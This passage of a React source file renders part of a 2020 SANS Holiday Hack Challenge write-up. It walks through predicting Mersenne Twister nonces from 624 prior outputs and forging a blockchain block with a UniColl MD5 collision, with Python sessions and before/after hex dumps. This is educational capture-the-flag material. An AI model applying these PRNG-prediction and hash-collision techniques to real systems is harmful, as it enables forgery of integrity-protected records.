    <span data-ty="input" data-ty-prompt=">>>">nonces = [str(block.nonce) for block in chain.blocks]</span>
    <span data-ty="input" data-ty-prompt=">>>">len(nonces)</span>
    <span data-ty><span className="NPC-text">624</span></span>
    <span data-ty="input" data-ty-prompt=">>>">import random</span>
    <span data-ty="input" data-ty-prompt=">>>">from mt19937predictor import MT19937Predictor</span>
    <span data-ty="input" data-ty-prompt=">>>">predictor = MT19937Predictor()</span>
    <span data-ty="input" data-ty-prompt=">>>">for i in range(len(nonces)):</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />predictor.setrandbits(nonces[i], 64)</span>
    <span data-ty="input" data-ty-prompt="..."></span>
    <span data-ty="input" data-ty-prompt=">>>">predictor.getrandbits(64)</span>
    <span data-ty>13205885317093879758</span>
    <span data-ty="input" data-ty-prompt=">>>">predictor.getrandbits(64)</span>
    <span data-ty>109892600914328301</span>
    <span data-ty="input" data-ty-prompt=">>>">predictor.getrandbits(64)</span>
    <span data-ty>9533956617156166628</span>
    <span data-ty="input" data-ty-prompt=">>>">ans = predictor.getrandbits(64)</span>
    <span data-ty="input" data-ty-prompt=">>>">'%016.016x' % (ans)</span>
    <span data-ty><span className="NPC-text">'57066318f32f729d'</span></span>
  </div>
);
const BLOCKCHAIN_SOLUTION_3 = (
  <p className="Narrator-block">
    We first loaded the blockchain into memory with the help of the <code>naughty_nice.py</code> script
    given to us in the <span className="Red-fancy">Official Naughty Nice Blockchain Education
    Pack</span>. We then use the installed MT predictor package to set the state of the PRNG
    and then load the next four 64-bit integers. The fourth should be the 130000th nonce so we can
    print it in the hex digest format as seen in the <code>naughty_nice.py</code> script.
  </p>
);
const BLOCKCHAIN_RANDOM_FINAL = (
  <p className="Text-block">
    Some investigating reveals that <span className="NPC-text">Jack Frost</span> abused the
    deterministic nature of the mersenne twister PRNG in order to predict the next nonce
    in the blockchain. What a clever fellow!
  </p>
);

/* ---- OBJECTIVE 11B ---- */
const BLOCKCHAIN_SECOND_INTRODUCTION = (
  <p className="Text-block"><span className="tab" />
    You have figured out how <span className="NPC-text">Jack Frost</span> predicted the next
    random nonce in the blockchain, but that is just one aspect of his maliciousness. How did
    he manage to modify his block on the chain while keeping the same MD5 hash for his block?
    You have heard that the MD5 hashing algorithm is very prone to collisions. Maybe he found
    a way to abuse collisions to make these modifications.
  </p>
);
const BLOCKCHAIN_SOLUTION_4 = (
  <p className="Narrator-block">
    We know now that <span className="NPC-text">Jack Frost</span> has found a way to modify
    a block on the blockchain to make him seem much nicer than he actually is. First, we
    need to figure out which block Jack has modified. We know the SHA256 hash digest of the
    block given in the objective description so this should just be a matter of looping
    through the blockchain and checking the hashes.
  </p>
);
const BLOCKCHAIN_TERMINAL_2 = (
  <div className="Terminal-block" id="termynal15" data-termynal>
    <span data-ty="input">python</span>
    <span data-ty>Python 3.6.12 (default, Dec 15 2020, 22:36:35)</span>
    <span data-ty>Type "help", "copyright", "credits" or "license" for more information.</span>
    <span data-ty="input" data-ty-prompt=">>>">from naughty_nice import Chain</span>
    <span data-ty="input" data-ty-prompt=">>>">chain = Chain(load=True, filename='blockchain.dat')</span>
    <span data-ty="input" data-ty-prompt=">>>">jackfrost_hash = "<span className="NPC-text">58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f</span>"</span>
    <span data-ty="input" data-ty-prompt=">>>">for idx, block in enumerate(chain.blocks):</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />hash_obj = SHA256.new()</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />hash_obj.update(block.block_data_signed())</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />if hash_obj.hexdigest() == jackfrost_hash:</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" /><span className="tab" />print(idx)</span>
    <span data-ty="input" data-ty-prompt="..."></span>
    <span data-ty><span className="NPC-text">1010</span></span>
  </div>
);
const BLOCKCHAIN_SOLUTION_5 = (
  <p className="Narrator-block">
    Now that we have found Jack's block we can inspect it with <code>chain.blocks[1010]</code> and
    begin to understand more about it using the functionality given to us in the <code>naughty_nice.py</code> script.
    Jack's block on the blockchain is interesting, it has two documents: a binary file and a
    PDF file. We can dump the PDF file using the <code>dump_doc()</code> function to see what it contains.
    We also see that Jack's block has a <span className="Red-fancy">Nice</span> sign since
    the value for the sign is 1 instead of 0 and a maximum (unsigned) integer value for score, this is
    represented with <span className="NPC-text">ffffffff</span> in hexadecimal. The first byte
    which Jack has changed is most likely the <span className="Red-fancy">Nice</span> sign from 0 (Naughty) to 1 (Nice).
  </p>
);
const CORKAMI_GIT_REPO = "https://github.com/corkami/collisions#pdf";
const BLOCKCHAIN_SOLUTION_6 = (
  <p className="Narrator-block">
    If we open the PDF file in our browser, we see glowing testaments for Jack
    from <span className="NPC-text">Mother Nature</span>, <span className="Red-fancy">Rudolph</span>,
    etc. <span className="NPC-text">Shinny Upatree</span> leaves a note at the bottom indicating that Jack is receiving a large
    Nice score because of these testaments; however, what is most strange, is that all of these 
    quotes from four different people (or reindeer?) are exactly the same. Seems fishy.
    This led me to inspect the contents of the PDF file with a basic text editor. After learning
    some basic PDF file structure, I noticed some properties which prove useful for understanding
    how Jack modified this document. First, there seems to be two sets of objects within the
    PDF, one starting with object number 2 and another nested starting with object number 3.
    Also, there is some binary data in the form of a line comment. A very similar example can
    be seen in corkami's <a href={CORKAMI_GIT_REPO}>document on collisions</a>. This will prove
    useful later for understanding how Jack pulled off a collision.
    The root object looks like this:
  </p>
);
const BLOCKCHAIN_PDF_SNIPPET = (
  "1 0 obj\n"
  + "<</Type/Catalog/_Go_Away/Santa/Pages 2 0 R      0�ٿW�<��\n"
  + "x��`�d����=cu>���bO�F��g��I������[I��܅9����T�s?姤��2��ThMIy8����:��P�2[�tu�B+sx�%ᩰ��(z�\n"
  + ">>\n"
  + "endobj"
);
const BLOCKCHAIN_PDF = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={BLOCKCHAIN_PDF_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const BLOCKCHAIN_SOLUTION_7 = (
  <p className="Narrator-block">
    We can see that Jack does not want <span className="Red-fancy">Santa</span> looking at
    this part of the file. Here we see the root object (1) define a catalog referencing object 2.
    But perhaps it should be referencing object 3? After making this change in <code>vim</code> and reloading the PDF file
    in a web browser, we see a completely different document. Apparently Jack went to an Austrailian
    zoo for the explicit reason of kicking a wombat. While <span className="NPC-text">Shinny Upatree</span> was writing
    this document for this block, expressing how awful Jack is and why he deserves a lot of Naughty points,
    he indicates that he was busy and had to leave but did not trust Jack to
    properly submit the report. However, he had to leave and he said he would leave a note to
    check and make sure the document was submitted properly. This explains why Jack was able to
    freely modify his block, Upatree forgot to validate that the document was as he had written it.
  </p>
);
const COLLISION_DECK = "https://speakerdeck.com/ange/colltris";
const BLOCKCHAIN_SOLUTION_8 = (
  <p className="Narrator-block">
    We have two bytes now, 1) Naughty/Nice sign was modified from 0 (Naughty) to 1 (Nice) and
    2) changing the reference in the PDF of the root object from 3 to 2. We only have two
    more bytes left which Jack has changed. Since, these two changes we have discovered
    would almost certainly change the MD5 hash of Jack's block, there must be some way
    which Jack caused a collision to occur in order to change these bytes without changing
    the hash value. We are given a hint about <span className="Red-fancy">UniColl</span>, a
    type of MD5 collision which is a really fast identical-prefix collision affecting the
    least-significant bit in the 10th byte of the prefix block. This has many implications
    which you can learn about in this very useful <a href={COLLISION_DECK}>speaker deck</a> by
    Ange Albertini on <span className="NPC-text">Hash Collision Exploitation</span>. The slides
    that are most useful in our case are 109 and 113 which show the 10th byte of the prefix
    block being incremented by 1 and the 10th byte of the following block being decremented
    by 1.
  </p>
);
const BLOCKCHAIN_SOLUTION_9 = (
  <p className="Narrator-block">
    A simple hex editor will be very useful here. We can take a look at how to write
    a block on the blockchain to a separate file and also how the <code>naughty_nice.py</code> script
    loads block data from a file: see <code>load_a_block()</code>. Then, we can correlate
    where the naughty/nice Sign byte should be in the block file.
  </p>
);
const BLOCKCHAIN_TERMINAL_3 = (
  <div className="Terminal-block" id="termynal16" data-termynal>
    <span data-ty="input">python</span>
    <span data-ty>Python 3.6.12 (default, Dec 15 2020, 22:36:35)</span>
    <span data-ty>Type "help", "copyright", "credits" or "license" for more information.</span>
    <span data-ty="input" data-ty-prompt=">>>">from naughty_nice import Chain</span>
    <span data-ty="input" data-ty-prompt=">>>">chain = Chain(load=True, filename='blockchain.dat')</span>
    <span data-ty="input" data-ty-prompt=">>>">chain.save_a_block(1010)</span>
  </div>
);
const BLOCKCHAIN_SOLUTION_10 = (
  <p className="Narrator-block">
    This will save Jack's block to <code>block.dat</code> and we can now open this file
    with our hex editor. Once we do, we should be checking to see if each of the two bytes
    that we found fall into the tenth byte of an MD5 block (64 bytes long).
  </p>
);
const HEX1_BEFORE = (
  <p className="Hex-block">
    {"00000040: 3266 6666 6666 6666 66"}<span className="NPC-text">31</span>{" 6666 3030 3030  2ffffffff1ff0000\n"}
    {"00000050: 3030 3663 ea46 5340 303a 6079 d3df 2762  006c.FS@0:`y..'b\n"}
    {"00000060: be68 467c 27f0 46d3 a7ff 4e92 dfe1 def7  .hF|'.F...N.....\n"}
    {"00000070: 407f 2a7b 73e1 b759 b8b9 1945 1e37 518d  @.*{s..Y...E.7Q.\n"}
    {"00000080: 22d9 8729 6fcb 0f18 8d"}<span className="NPC-text">d6</span>{" 0388 bf20 350f  \"..)o........ 5.\n"}
    {"00000090: 2a91 c29d 0348 614d c0bc eef2 bcad d4cc  *....HaM........\n"}
    {"000000a0: 3f25 1ba8 f9fb af17 1a06 df1e 1fd8 6493  ?%............d.\n"}
    {"000000b0: 96ab 86f9 d511 8cc8 d820 4b4f fe8d 8f09  ......... KO...."}
  </p>
);
const BLOCKCHAIN_SOLUTION_11 = (
  <p className="Narrator-block">
    In the hex, we see that the Sign bit (31) falls in the tenth byte of an MD5 block of this
    file since it is the 74th byte. We can also see that the tenth byte of the following block
    is part of the data in the binary document attached to this block. We can confirm this
    by dumping the binary file and checking to make sure that the hex correlates. If this was
    a UniColl collision, Jack would have turned the 30 byte to a 31 in order to flip the Sign
    byte. That means, he would have had to also flipped the d7 byte to d6 in order to create a
    collision with the original block. This is what the original block looked like before the
    Sign bit changed:
  </p>
);
const HEX1_AFTER = (
  <p className="Hex-block">
    {"00000040: 3266 6666 6666 6666 66"}<span className="NPC-text">30</span>{" 6666 3030 3030  2ffffffff0ff0000\n"}
    {"00000050: 3030 3663 ea46 5340 303a 6079 d3df 2762  006c.FS@0:`y..'b\n"}
    {"00000060: be68 467c 27f0 46d3 a7ff 4e92 dfe1 def7  .hF|'.F...N.....\n"}
    {"00000070: 407f 2a7b 73e1 b759 b8b9 1945 1e37 518d  @.*{s..Y...E.7Q.\n"}
    {"00000080: 22d9 8729 6fcb 0f18 8d"}<span className="NPC-text">d7</span>{" 0388 bf20 350f  \"..)o........ 5.\n"}
    {"00000090: 2a91 c29d 0348 614d c0bc eef2 bcad d4cc  *....HaM........\n"}
    {"000000a0: 3f25 1ba8 f9fb af17 1a06 df1e 1fd8 6493  ?%............d.\n"}
    {"000000b0: 96ab 86f9 d511 8cc8 d820 4b4f fe8d 8f09  ......... KO...."}
  </p>
);
const BLOCKCHAIN_SOLUTION_12 = (
  <p className="Narrator-block">
    We can follow the same approach for the byte in the PDF document. We can find the byte
    that Jack changed and check to see if the same byte in the next MD5 block could have
    been changed to create a collision.
  </p>
);
const HEX2_BEFORE = (
  <p className="Hex-block">
    {"00000100: 7461 2f50 6167 6573 20"}<span className="NPC-text">32</span>{" 2030 2052 2020  ta/Pages 2 0 R  \n"}
    {"00000110: 2020 2020 30f9 d9bf 578e 3caa e50d 788f      0...W.<...x.\n"}
    {"00000120: e760 f31d 64af aa1e a1f2 a13d 6375 3e1a  .`..d......=cu>.\n"}
    {"00000130: a5bf 8062 4fc3 46bf d667 caf7 4995 91c4  ...bO.F..g..I...\n"}
    {"00000140: 0201 edab 03b9 ef95 99"}<span className="NPC-text">1c</span>{" 5b49 9f86 dc85  ..........[I....\n"}
    {"00000150: 3985 9099 ad54 b01e 733f e5a7 a489 b932  9....T..s?.....2\n"}
    {"00000160: 95ff 5468 034d 4979 38e8 f9b8 cb3a c3cf  ..Th.MIy8....:..\n"}
    {"00000170: 50f0 1b32 5b9b 1774 7595 422b 7378 f025  P..2[..tu.B+sx.%"}
  </p>
);
const BLOCKCHAIN_SOLUTION_13 = (
  <p className="Narrator-block">
    We see that again the byte is the tenth byte in an MD5 block and that the same byte
    in the next block could have been changed since it is in one of the PDF line comment
    data mentioned previously. In this case, Jack needed to change byte 33 to 32 meaning that
    he would have also had to change byte 1b to 1c in order to create another hash collision.
    This is what the original block looked like before the PDF change:
  </p>
);
const HEX2_AFTER = (
  <p className="Hex-block">
    {"00000100: 7461 2f50 6167 6573 20"}<span className="NPC-text">33</span>{" 2030 2052 2020  ta/Pages 3 0 R  \n"}
    {"00000110: 2020 2020 30f9 d9bf 578e 3caa e50d 788f      0...W.<...x.\n"}
    {"00000120: e760 f31d 64af aa1e a1f2 a13d 6375 3e1a  .`..d......=cu>.\n"}
    {"00000130: a5bf 8062 4fc3 46bf d667 caf7 4995 91c4  ...bO.F..g..I...\n"}
    {"00000140: 0201 edab 03b9 ef95 99"}<span className="NPC-text">1b</span>{" 5b49 9f86 dc85  ..........[I....\n"}
    {"00000150: 3985 9099 ad54 b01e 733f e5a7 a489 b932  9....T..s?.....2\n"}
    {"00000160: 95ff 5468 034d 4979 38e8 f9b8 cb3a c3cf  ..Th.MIy8....:..\n"}
    {"00000170: 50f0 1b32 5b9b 1774 7595 422b 7378 f025  P..2[..tu.B+sx.%"}
  </p>
);
const BLOCKCHAIN_SOLUTION_14 = (
  <p className="Narrator-block">
    After all of these changes, we can verify that this block has the same MD5 hash as
    the original by using <code>load_a_block()</code> and getting the MD5 hash of both
    the block before and after it was modified. Finally, we can take the SHA256 of the
    modified block data.
  </p>
);
const BLOCKCHAIN_TERMINAL_4 = (
  <div className="Terminal-block" id="termynal17" data-termynal>
    <span data-ty="input">python</span>
    <span data-ty>Python 3.6.12 (default, Dec 15 2020, 22:36:35)</span>
    <span data-ty>Type "help", "copyright", "credits" or "license" for more information.</span>
    <span data-ty="input" data-ty-prompt=">>>">from naughty_nice import Block, Chain</span>
    <span data-ty="input" data-ty-prompt=">>>">from Crypto.Hash import SHA256</span>
    <span data-ty="input" data-ty-prompt=">>>">chain = Chain(load=True, filename='blockchain.dat')</span>
    <span data-ty="input" data-ty-prompt=">>>">with open('block.dat', 'rb') as fh:</span>
    <span data-ty="input" data-ty-prompt="..."><span className="tab" />chain.blocks.append(Block(load=True).load_a_block(fh))</span>
    <span data-ty="input" data-ty-prompt="..."></span>
    <span data-ty="input" data-ty-prompt=">>>">hash_obj = SHA256.new()</span>
    <span data-ty="input" data-ty-prompt=">>>">hash_obj.update(chain.blocks[-1].block_data_signed())</span>
    <span data-ty="input" data-ty-prompt=">>>">hash_obj.hexdigest()</span>
    <span data-ty>'<span className="NPC-text">fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb</span>'</span>
  </div>
);
const BLOCKCHAIN_FINAL_1 = (
  <p className="Text-block">
    That's it! <span className="NPC-text">Jack Frost</span> used a specific collision known
    as <span className="Red-fancy">UniColl</span> to only modify four bytes while keeping
    the same MD5 hash. He managed to modify his block's <span className="Red-fancy">Sign</span> from
    Naughty to Nice and an object reference in the attached PDF document structure. From the contents
    of the original document which <span className="NPC-text">Shinny Upatree</span> actually wrote,
    it seems as if <span className="NPC-text">Jack Frost</span> added a whole unreferenced document structure
    to the PDF which <span className="NPC-text">Shinny Upatree</span> would not have noticed unless
    he inspected the PDF source. Once attached, <span className="NPC-text">Jack Frost</span> was
    able to modify both of these bytes after the fact, along with two other unimportant bytes
    necessary for <span className="Red-fancy">UniColl</span> collision, in order to produce such
    a dramatic change in the appearance of his block in the chain with the same MD5 hash.
  </p>
);
const BLOCKCHAIN_FINAL_2 = (
  <p className="Text-block">
    As your cactus self, you head back to the balcony attached to <span className="Red-fancy">Santa's Office</span> only
    to find the real <span className="Red-fancy">Santa</span>, <span className="NPC-text">Eve Snowshoes</span>,
    and <span className="NPC-text">Jack Frost</span> in handcuffs and an orange jumpsuit. They
    tell you that they had been suspicious of <span className="NPC-text">Jack Frost</span> for some
    time and finally had collected the necessary evidence, all thanks to your help. <span className="Red-fancy">Santa</span> explains
    that <span className="NPC-text">Jack Frost</span> was the one who sent the magical portrait,
    allowing himself to impersonate <span className="Red-fancy">Santa</span> and cause so much
    havoc around <span className="Red-fancy">Kringle Castle</span>.
  </p>
);

var TERMS = [];
var TERM_COUNT = 17;
for (var i = 1; i <= TERM_COUNT; i++) { TERMS.push(i); }
const TERMYNALS = TERMS.map((i) => `#termynal${i}`).join(',');

/* ~~~SNOWFLAKES~~~ */
const SNOWFLAKE_PROPERTIES = {
  color: "#ffffff",
  count: 50,
  zIndex: 100
}

class App extends React.Component {
  constructor() {
    super();
    this.state = {
      snowflakesToggled: true
    };
    this.SNOWFLAKES = new Snowflakes(SNOWFLAKE_PROPERTIES);
  }

  toggleSnowflakes = () => {
    let newState = !this.state.snowflakesToggled;
    if (newState) {
      this.SNOWFLAKES = new Snowflakes(SNOWFLAKE_PROPERTIES);
    } else {
      this.SNOWFLAKES.destroy();
      this.SNOWFLAKES = null;
    }
    this.setState({
      snowflakesToggled: newState
    });
  }

  componentDidMount = () => {
    this.setState({
      terminals: new Termynal(TERMYNALS, {noInit: true})
    });
  }

  componentWillUnmount = () => {
    if (this.SNOWFLAKES !== null) {
      this.SNOWFLAKES.destroy();
    }
  }

  render() {
    let toggleButtonVariant = this.state.snowflakesToggled ? "light" : "primary";
    return (
      <div className="App">
        <Navbar fixed="top" expand="false" bg="dark" variant="dark">
          <Link to="/" className="NavLink nav-link" href="/">Home</Link>
          <Navbar.Toggle aria-controls="basic-navbar-nav" />
          <Navbar.Collapse id="basic-navbar-nav">
            <Nav className="mr-auto">
              <Button className="Toggle-button" variant={toggleButtonVariant}
                  onClick={this.toggleSnowflakes}>Toggle Snowflakes</Button>
            </Nav>
          </Navbar.Collapse>
        </Navbar>
        <header className="App-header">
          <ScrollArea className="App-scrollable"
              speed={1.5}
              horizontal={false}
              smoothScrolling={true}>
            <div className="App-container">
              <Image className="Header-image" src={header} rounded />
              <h1 className="Header-big">KringleCon 3: French Hens Writeup</h1>
              <h5 className="Header-small">2020 SANS Holiday Hack Challenge</h5>

              {/* INTRODUCTION */}
              <div className="Section-block">
                <Image className="Character-image" align="left" src={character} />
                {INTRODUCTION}{STARTING_AREA}
              </div>

              {/* OBJECTIVE 1 - Uncover Santa's Gift List */}
              <h3 className="Header-big">Objective 1 - Uncover Santa's Gift List</h3>
              <div className="Section-block">
                <Image className="Giftlist-image" align="right" src={SANTAS_GIFT_LIST_SRC} rounded />
                {SANTAS_GIFT_LIST}{RELIABLE_NARRATOR_INTRODUCTION}
                <Image className="Untwirled-image" align="left" src={untwirled} rounded />
                {SANTAS_GIFT_LIST_SOLVED}{SANTAS_GIFT_LIST_TRANSITION}
              </div>

              {/* OBJECTIVE 2 - Investigate S3 Bucket */}
              <h3 className="Header-big">Objective 2 - Investigate S3 Bucket</h3>
              <div className="Section-block">
                {S3_INTRODUCTION}{S3_INTRODUCTION_CONTINUED}
                {S3_SOLUTION_1}{S3_TERMINAL_1}
                {S3_SOLUTION_2}{S3_TERMINAL_2}
                {S3_SOLUTION_3}{S3_FINAL}
              </div>

              {/* OBJECTIVE 3 - Point-of-Sale Password Recovery */}
              <h3 className="Header-big">Objective 3 - Point-of-Sale Password Recovery</h3>
              <div className="Section-block">
                {POS_INTRODUCTION_1}{POS_INTRODUCTION_2}
                {POS_SOLUTION_1}{POS_CODE_BLOCK}{POS_FINAL}
              </div>

              {/* OBJECTIVE 4 - Operate the Santavator */}
              <h3 className="Header-big">Objective 4 - Operate the Santavator</h3>
              <div className="Section-block">
                <Image className="Santavator-panel-image" align="right" src={santavator_panel} rounded />
                {SANTAVATOR_SOLUTION}{SANTAVATOR_SOLUTION_2}{SANTAVATOR_APPROACH}
              </div>

              {/* OBJECTIVE 5 - Open HID Lock */}
              <h3 className="Header-big">Objective 5 - Open HID Lock</h3>
              <div className="Section-block">
                {HID_INTRODUCTION}
                {HID_SOLUTION_1}{HID_TERMINAL_1}
                {HID_SOLUTION_2}{HID_TERMINAL_2}
                {HID_FINAL}
              </div>

              {/* OBJECTIVE 6 - Splunk Challenge */}
              <h3 className="Header-big">Objective 6 - Splunk Challenge</h3>
              <div className="Section-block">
                {SPLUNK_INTRODUCTION}
                {SPLUNK_SOLUTION_1}
                {SPLUNK_Q1}{SPLUNK_A1}
                {SPLUNK_Q2}{SPLUNK_A2}
                {SPLUNK_Q3}{SPLUNK_A3}
                {SPLUNK_Q4}{SPLUNK_A4}
                {SPLUNK_Q5}{SPLUNK_A5}
                {SPLUNK_Q6}{SPLUNK_A6}
                {SPLUNK_Q7}{SPLUNK_A7}
                {SPLUNK_CHALLENGE}{SPLUNK_CHALLENGE_ANSWER}
                {SPLUNK_SOLUTION}{SPLUNK_TERMINAL}
                {SPLUNK_FINAL}
              </div>

              {/* OBJECTIVE 7 - Solve the Sleigh's CAN-D-BUS Problem */}
              <h3 className="Header-big">Objective 7 - Solve the Sleigh's CAN-D-BUS Problem</h3>
              <div className="Section-block">
                {CANDBUS_INTRODUCTION}
                {CANDBUS_SOLUTION_1}{CANDBUS_CODES_1}
                {CANDBUS_SOLUTION_2}{CANDBUS_CODES_2}
                {CANDBUS_SOLUTION_3}{CANDBUS_CODES_3}
                {CANDBUS_SOLUTION_4}{CANDBUS_CODES_4}
                {CANDBUS_SOLUTION_5}
                {CANDBUS_FINAL}
              </div>

              {/* OBJECTIVE 8 - Broken Tag Generator */}
              <h3 className="Header-big">Objective 8 - Broken Tag Generator</h3>
              <div className="Section-block">
                {TAG_INTRODUCTION}
                {TAG_SOLUTION_1}{TAG_TERMINAL_1}
                {TAG_SOLUTION_2}{TAG_TERMINAL_2}
                {TAG_SOLUTION_3}{TAG_SOLUTION_3_1}{TAG_SOLUTION_3_2}{TAG_TERMINAL_3}
                {TAG_SOLUTION_4}{TAG_TERMINAL_4}
                {TAG_SOLUTION_5}
                {TAG_FINAL}
              </div>

              {/* OBJECTIVE 9 - ARP Shenanigans */}
              <h3 className="Header-big">Objective 9 - ARP Shenanigans</h3>
              <div className="Section-block">
                {ARP_INTRODUCTION}
                {ARP_SOLUTION_1}{ARP_TERMINAL_1}
                {ARP_SOLUTION_2}{ARP_SPOOF}
                {ARP_SOLUTION_3}{ARP_TERMINAL_2}{ARP_OUTPUT}
                {ARP_SOLUTION_4}{DNS_SPOOF}{ARP_TERMINAL_3}
                {ARP_SOLUTION_5}{ARP_TERMINAL_4}
                {ARP_SOLUTION_6}{POSTINST}
                {ARP_SOLUTION_7}{ARP_SOLUTION_8}
                {ARP_FINAL}
              </div>

              {/* OBJECTIVE 10 - Defeat Fingerprint Sensor */}
              <h3 className="Header-big">Objective 10 - Defeat Fingerprint Sensor</h3>
              <div className="Section-block">
                {FINGERPRINT_INTRODUCTION}
                {FINGERPRINT_SOLUTION_1}{FINGERPRINT_CODE1}
                {FINGERPRINT_SOLUTION_2}{FINGERPRINT_SOLUTION_3}{FINGERPRINT_CODE2}
                {FINGERPRINT_SOLUTION_4}
              </div>

              {/* OBJECTIVE 11A - Naughty/Nice List with Blockchain Investigation Part 1 */}
              <h3 className="Header-big">Objective 11A - Naughty/Nice List with Blockchain Investigation Part 1</h3>
              <div className="Section-block">
                {BLOCKCHAIN_INTRODUCTION}
                {BLOCKCHAIN_SOLUTION_1}
                {BLOCKCHAIN_SOLUTION_2}{BLOCKCHAIN_TERMINAL_1}
                {BLOCKCHAIN_SOLUTION_3}
                {BLOCKCHAIN_RANDOM_FINAL}
              </div>

              {/* OBJECTIVE 11B - Naughty/Nice List with Blockchain Investigation Part 2 */}
              <h3 className="Header-big">Objective 11B - Naughty/Nice List with Blockchain Investigation Part 2</h3>
              <div className="Section-block">
                {BLOCKCHAIN_SECOND_INTRODUCTION}
                {BLOCKCHAIN_SOLUTION_4}{BLOCKCHAIN_TERMINAL_2}
                {BLOCKCHAIN_SOLUTION_5}
                {BLOCKCHAIN_SOLUTION_6}{BLOCKCHAIN_PDF}
                {BLOCKCHAIN_SOLUTION_7}
                {BLOCKCHAIN_SOLUTION_8}
                {BLOCKCHAIN_SOLUTION_9}{BLOCKCHAIN_TERMINAL_3}
                {BLOCKCHAIN_SOLUTION_10}{HEX1_BEFORE}
                {BLOCKCHAIN_SOLUTION_11}{HEX1_AFTER}
                {BLOCKCHAIN_SOLUTION_12}{HEX2_BEFORE}
                {BLOCKCHAIN_SOLUTION_13}{HEX2_AFTER}
                {BLOCKCHAIN_SOLUTION_14}{BLOCKCHAIN_TERMINAL_4}
                {BLOCKCHAIN_FINAL_1}{BLOCKCHAIN_FINAL_2}
              </div>

              <h3 className="Header-big">Video Walkthrough and Terminal Solutions Coming Soon!</h3>
            </div>
          </ScrollArea>
        </header>
      </div>
    );
  }
}

export default App;
